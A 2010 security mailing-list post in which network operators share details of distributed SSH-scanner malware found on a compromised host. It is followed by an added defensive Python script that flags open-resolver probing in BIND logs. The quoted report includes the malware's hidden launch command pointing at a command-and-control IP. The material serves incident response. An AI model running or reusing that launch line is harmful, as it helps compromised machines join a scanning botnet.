[nsp-sec] distributed ssh scanners again
Mike Tancsa
mike at sentex.net
Wed Nov 3 12:25:25 EDT 2010
At 11:43 AM 11/3/2010, Torsten Voss wrote:
>----------- nsp-security Confidential --------
>
>-----BEGIN PGP SIGNED MESSAGE-----
>Hash: SHA1
>
>Hi,
>
>we've received the malware from a compromised system:
>
>The malware was started similarly to the last one in summer:
>
>PATH=/bin:/sbin:/usr/bin:/usr/local/bin:/usr/sbin;/tmp/dd_ssh 300
>217.79.190.53 2 2>/dev/null >/dev/null
>
>217.79.190.53 is probably the C&C server for the distributed ssh scans
Looking through my flows, this host was involved in a large scan
aimed at UDP port 53. It happened to hit one of my resolvers which logged
Nov 2 05:02:51 auth2 named[3784]: client 217.79.190.53#58439: query (cache) 'isc.org/TXT/IN' denied
Other than looking for open resolvers, not sure what else they are up to.
---Mike
--------------------------------------------------------------------
Mike Tancsa, tel +1 519 651 3400
Sentex Communications, mike at sentex.net
Providing Internet since 1994 www.sentex.net
Cambridge, Ontario Canada www.sentex.net/mike
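As an added illustration (not code from the post or the nsp-security list): the kind of check a resolver operator could run over BIND "query (cache) ... denied" lines like the one above to see which sources are being refused recursion, and which of them ask for isc.org/TXT, the large-answer name used in the log above to test for open recursion. The sample log lines are constructed; only the first is the one from the post, and the other client addresses are documentation-range placeholders.

```python
import re
from collections import defaultdict

# Matches BIND "query (cache) '<name>/<type>/IN' denied" lines in the format
# shown in the post (recursion refused to a client outside the allowed ACL).
DENIED_RE = re.compile(
    r"named\[\d+\]: client (?P<ip>\d{1,3}(?:\.\d{1,3}){3})#\d+: "
    r"query \(cache\) '(?P<qname>[^'/]+)/(?P<qtype>[A-Z0-9]+)/IN' denied"
)

# Names with large answers that are commonly used to test whether a server
# recurses for strangers; isc.org/TXT is the one seen in the log above.
PROBE_NAMES = {("isc.org", "TXT")}


def parse_denied(line):
    """Return (client_ip, qname, qtype) for a denied-query line, else None."""
    m = DENIED_RE.search(line)
    if not m:
        return None
    return m.group("ip"), m.group("qname").lower(), m.group("qtype")


def denied_by_client(lines):
    """Count refused recursive queries per client and note probe-style names."""
    counts = defaultdict(int)
    probes = defaultdict(set)
    for line in lines:
        parsed = parse_denied(line)
        if parsed is None:
            continue  # permitted query or unrelated named log line
        ip, qname, qtype = parsed
        counts[ip] += 1
        if (qname, qtype) in PROBE_NAMES:
            probes[ip].add(f"{qname}/{qtype}")
    return dict(counts), {ip: sorted(v) for ip, v in probes.items()}


# Constructed sample: the line from the post, two made-up clients using
# documentation-range addresses, and one ordinary permitted query.
SAMPLE_LOG = [
    "Nov 2 05:02:51 auth2 named[3784]: client 217.79.190.53#58439: query (cache) 'isc.org/TXT/IN' denied",
    "Nov 2 05:02:52 auth2 named[3784]: client 198.51.100.7#4242: query (cache) 'isc.org/TXT/IN' denied",
    "Nov 2 05:02:53 auth2 named[3784]: client 198.51.100.7#4243: query (cache) 'example.net/A/IN' denied",
    "Nov 2 05:02:54 auth2 named[3784]: client 203.0.113.9#5353: query: sentex.net IN A + (192.0.2.1)",
]

if __name__ == "__main__":
    counts, probes = denied_by_client(SAMPLE_LOG)
    for ip in sorted(counts):
        print(f"{ip}: {counts[ip]} denied, probe names: {probes.get(ip, [])}")
```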